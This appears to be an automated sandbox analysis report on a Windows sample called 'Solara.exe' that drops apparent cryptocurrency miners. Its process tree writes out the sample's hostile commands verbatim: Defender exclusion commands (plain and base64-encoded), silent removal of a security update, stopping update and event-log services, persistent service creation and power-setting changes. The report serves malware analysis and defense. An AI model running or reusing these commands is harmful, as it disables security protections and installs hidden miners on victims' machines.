139c41c5638d344cf6a0f8fb38c61b3f657544b01dd95daff62d0e4b8ff908a1

Analysis

max time kernel
16s
max time network
37s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
25/09/2024, 20:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Solara.exe
Size

21.2MB
MD5

a6bf6970741f337bcb700166165c1f30
SHA1

f90ace8f03e2b76e243d539c8570d157f658d025
SHA256

139c41c5638d344cf6a0f8fb38c61b3f657544b01dd95daff62d0e4b8ff908a1
SHA512

c5ef34314bfbd5db99d8d02981e4ce5b46776bdae87e4768963fa902319a4d9712afe7bca302688a424eb9e7dffb9aa5da8444ea2877a48e3f9dd67622477521
SSDEEP

393216:fOQxoHOKgCanLd/l/NmA6MierK6sl0Ibft5/TqcJb45EGle:2hOKgj/4MTrKV9ft5bqR5EGle

Score

8^/10

defense_evasion discovery evasion execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1736	powershell.exe
2124	powershell.exe
1856	powershell.exe
1912	powershell.exe
1460	powershell.exe
1664	powershell.exe
652	powershell.exe
2404	powershell.exe
2384	powershell.exe
1572	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 7 IoCs

pid	Process
2212	eth.exe
2896	xmr.exe
2816	Solara Bootstrapper.exe
2712	kx new.exe
2236	SolaraBootstrapper.exe
1052	Kawpow new.exe
2596	xmr new.exe

Loads dropped DLL 11 IoCs

pid	Process
1620	Solara.exe
1620	Solara.exe
1620	Solara.exe
1620	Solara.exe
1620	Solara.exe
2816	Solara Bootstrapper.exe
2816	Solara Bootstrapper.exe
2712	kx new.exe
2712	kx new.exe
2712	kx new.exe
2712	kx new.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2280	powercfg.exe
1716	powercfg.exe
1604	powercfg.exe
2152	powercfg.exe
1580	powercfg.exe
1544	powercfg.exe
2612	powercfg.exe
1712	powercfg.exe

Launches sc.exe 43 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1084	sc.exe
1748	sc.exe
1468	sc.exe
2352	sc.exe
824	sc.exe
340	sc.exe
2892	sc.exe
2136	sc.exe
1292	sc.exe
2324	sc.exe
3012	sc.exe
2144	sc.exe
1348	sc.exe
1348	sc.exe
2904	sc.exe
2372	sc.exe
1912	sc.exe
600	sc.exe
1516	sc.exe
2280	sc.exe
2572	sc.exe
2776	sc.exe
1204	sc.exe
1660	sc.exe
2744	sc.exe
2516	sc.exe
2952	sc.exe
2920	sc.exe
1828	sc.exe
1664	sc.exe
1968	sc.exe
2140	sc.exe
472	sc.exe
2076	sc.exe
2144	sc.exe
2400	sc.exe
2692	sc.exe
2644	sc.exe
1348	sc.exe
2136	sc.exe
2336	sc.exe
1356	sc.exe
2520	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Solara Bootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kx new.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SolaraBootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Solara.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2872	powershell.exe
2348	powershell.exe
2984	powershell.exe
2236	SolaraBootstrapper.exe
2236	SolaraBootstrapper.exe
2212	eth.exe
2896	xmr.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	2236	SolaraBootstrapper.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 1620 wrote to memory of 2348	1620	Solara.exe	30
PID 1620 wrote to memory of 2348	1620	Solara.exe	30
PID 1620 wrote to memory of 2348	1620	Solara.exe	30
PID 1620 wrote to memory of 2348	1620	Solara.exe	30
PID 1620 wrote to memory of 2212	1620	Solara.exe	32
PID 1620 wrote to memory of 2212	1620	Solara.exe	32
PID 1620 wrote to memory of 2212	1620	Solara.exe	32
PID 1620 wrote to memory of 2212	1620	Solara.exe	32
PID 1620 wrote to memory of 2896	1620	Solara.exe	33
PID 1620 wrote to memory of 2896	1620	Solara.exe	33
PID 1620 wrote to memory of 2896	1620	Solara.exe	33
PID 1620 wrote to memory of 2896	1620	Solara.exe	33
PID 1620 wrote to memory of 2816	1620	Solara.exe	34
PID 1620 wrote to memory of 2816	1620	Solara.exe	34
PID 1620 wrote to memory of 2816	1620	Solara.exe	34
PID 1620 wrote to memory of 2816	1620	Solara.exe	34
PID 2816 wrote to memory of 2872	2816	Solara Bootstrapper.exe	35
PID 2816 wrote to memory of 2872	2816	Solara Bootstrapper.exe	35
PID 2816 wrote to memory of 2872	2816	Solara Bootstrapper.exe	35
PID 2816 wrote to memory of 2872	2816	Solara Bootstrapper.exe	35
PID 2816 wrote to memory of 2712	2816	Solara Bootstrapper.exe	37
PID 2816 wrote to memory of 2712	2816	Solara Bootstrapper.exe	37
PID 2816 wrote to memory of 2712	2816	Solara Bootstrapper.exe	37
PID 2816 wrote to memory of 2712	2816	Solara Bootstrapper.exe	37
PID 2816 wrote to memory of 2236	2816	Solara Bootstrapper.exe	38
PID 2816 wrote to memory of 2236	2816	Solara Bootstrapper.exe	38
PID 2816 wrote to memory of 2236	2816	Solara Bootstrapper.exe	38
PID 2816 wrote to memory of 2236	2816	Solara Bootstrapper.exe	38
PID 2712 wrote to memory of 2984	2712	kx new.exe	40
PID 2712 wrote to memory of 2984	2712	kx new.exe	40
PID 2712 wrote to memory of 2984	2712	kx new.exe	40
PID 2712 wrote to memory of 2984	2712	kx new.exe	40
PID 2712 wrote to memory of 1052	2712	kx new.exe	42
PID 2712 wrote to memory of 1052	2712	kx new.exe	42
PID 2712 wrote to memory of 1052	2712	kx new.exe	42
PID 2712 wrote to memory of 1052	2712	kx new.exe	42
PID 2712 wrote to memory of 2596	2712	kx new.exe	43
PID 2712 wrote to memory of 2596	2712	kx new.exe	43
PID 2712 wrote to memory of 2596	2712	kx new.exe	43
PID 2712 wrote to memory of 2596	2712	kx new.exe	43

C:\Users\Admin\AppData\Local\Temp\Solara.exe
"C:\Users\Admin\AppData\Local\Temp\Solara.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1620
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2348
- C:\Users\Admin\AppData\Local\Temp\eth.exe
  "C:\Users\Admin\AppData\Local\Temp\eth.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2212
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2004
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:1072
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2144
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2400
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2136
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:1748
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:1468
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2440
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "ARIBLEUL"
    3⤵
    - Launches sc.exe
    PID:600
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2352
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2136
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "ARIBLEUL"
    3⤵
    - Launches sc.exe
    PID:1204
- C:\Users\Admin\AppData\Local\Temp\xmr.exe
  "C:\Users\Admin\AppData\Local\Temp\xmr.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2896
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1660
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2224
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1664
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2336
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1968
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:1348
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:824
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2972
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2516
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "ARIBLEUL"
    3⤵
    - Launches sc.exe
    PID:1356
- C:\Users\Admin\AppData\Local\Temp\Solara Bootstrapper.exe
  "C:\Users\Admin\AppData\Local\Temp\Solara Bootstrapper.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2872
- - C:\Users\Admin\AppData\Local\Temp\kx new.exe
    "C:\Users\Admin\AppData\Local\Temp\kx new.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2984
  - - C:\Users\Admin\AppData\Local\Temp\Kawpow new.exe
      "C:\Users\Admin\AppData\Local\Temp\Kawpow new.exe"
      4⤵
      Executes dropped EXE
      PID:1052
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:2140
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:2844
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:2372
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1516
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:2572
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:1912
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:472
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        
        PID:2280
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        
        PID:1712
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Power Settings
        
        PID:2612
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:1544
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        5⤵
        
        PID:2940
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "CKTJZLMO"
        5⤵
        Launches sc.exe
        
        PID:2076
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:340
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:1828
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "CKTJZLMO"
        5⤵
        Launches sc.exe
        
        PID:2776
  - - C:\Users\Admin\AppData\Local\Temp\xmr new.exe
      "C:\Users\Admin\AppData\Local\Temp\xmr new.exe"
      4⤵
      Executes dropped EXE
      PID:2596
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1460
- - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2236

C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
1⤵
PID:2004
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1688
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1948
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1292
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1660
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2692
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2744
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1348
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:2060
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:1728
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1736
- - C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
    "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe"
    3⤵
    PID:2932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:652
- - C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
    "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe"
    3⤵
    PID:2524
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:1588
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1872
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3012
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1084
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:2520
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:2808

C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
1⤵
PID:1224
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2492
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:824
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2904
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2952
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2140
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2920
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2644
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:1592
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:600
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:2184

C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
1⤵
PID:2640
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2132
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2560
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2144
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2324
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2892
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1348
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2280
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1580
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2152
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1604
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1716
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:1828
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:568
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe

Filesize
2.9MB

MD5
07ae042f167d7bc86265bdbc76167438

SHA1
0188b187a88b7465f8f9d610e955c969fb8e477d

SHA256
fa06e9f73c5d4344ead083670feeb69fde341899296af449a93fffca4377b611

SHA512
7f2f445a5a1f79b818ad1105ae5fe8d3d37b8403fadb2d8af34437bd808b5b0ff537150018f8ee87bdbfbcc35e55964af42b0933dff12513faec507281bf1276

Download Submit
C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe

Filesize
3.2MB

MD5
d034f3ba65922ffc11c75990c6706cc0

SHA1
2323471d9bd01abc629aae3b9a6e41c7cb366261

SHA256
4b170c0f40acae328e93cc631345fec9eabccfd32d231716f53e829b33204149

SHA512
fe48d9708d2418e0b73ab0984121aad966a24af6272883828032d883b3c6a7ad127c40072501540cf122ebce58c7b957c462e6106cb33ed4dc8dfdc023770e6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kawpow new.exe

Filesize
5.2MB

MD5
fb6a3b436e9f9402937d95f755b62f91

SHA1
aea3a8a311c2b8b6fc7d9d263b952f95a30b180e

SHA256
4c9d878e35e7fd497c633a770d3359fb37447985450dc19f45db0925972c39e0

SHA512
7a3e2e42fe965db1cebc539235fec88e277669c9a62be2450ea4efaf5dd93f1de11740197ff26e697e9e9acc499cba2c30b64cfa5e5b35b28b9e0b93087ee2f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\kx new.exe

Filesize
10.4MB

MD5
d9d13fa25e880665fb471a4be57c494c

SHA1
7a4c1b09a9d37ff55872544a39a2cc5f0eec9523

SHA256
632e973ab369d51e21b499e440bdd9c4b2ffaac9e435485a648de8724e1b19f7

SHA512
cf20f3c108865614a27d498ee74198ee151027423b518024155b1dff553b33877aed81e7d5394094625d1ee7da5de82fa4ed119420009a3f3fc51019add3522e

Download Submit
C:\Users\Admin\AppData\Local\Temp\xmr new.exe

Filesize
5.2MB

MD5
7d6398ebfb82a24748617189bf4ad691

SHA1
6c96d0e343e1e84bf58670f1249c1694a2012f04

SHA256
d7cd81563e5b98b9a329286557de71186d3f8f364a46691aca253ca00e4c3ef2

SHA512
9aeb3da479b23880de94e0b283a562ce19a79c2b27cb819ddf8e149eca5673a42c659fff10ea2ea9036aedda6fef37b97ecbf37236dd22baf20eba1e6dda4b4a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f83c87ffefd9527389c7bb25d4cf1a84

SHA1
553a1b2d238c44e468e369151954481f0efa1b72

SHA256
fd2731b34290c28e05f79445eb93795fd44e2d517af3fb9e129a92d44c3b0012

SHA512
6010b10d1eb165b6b7502bc40b83c03d6fa5c1c6df5288906ae10942601e1c75063f0b4c2ad7cde2a3ab3ab1aba42d08b8115f464faf5dd05ea7078ca1fe1d68

Download Submit
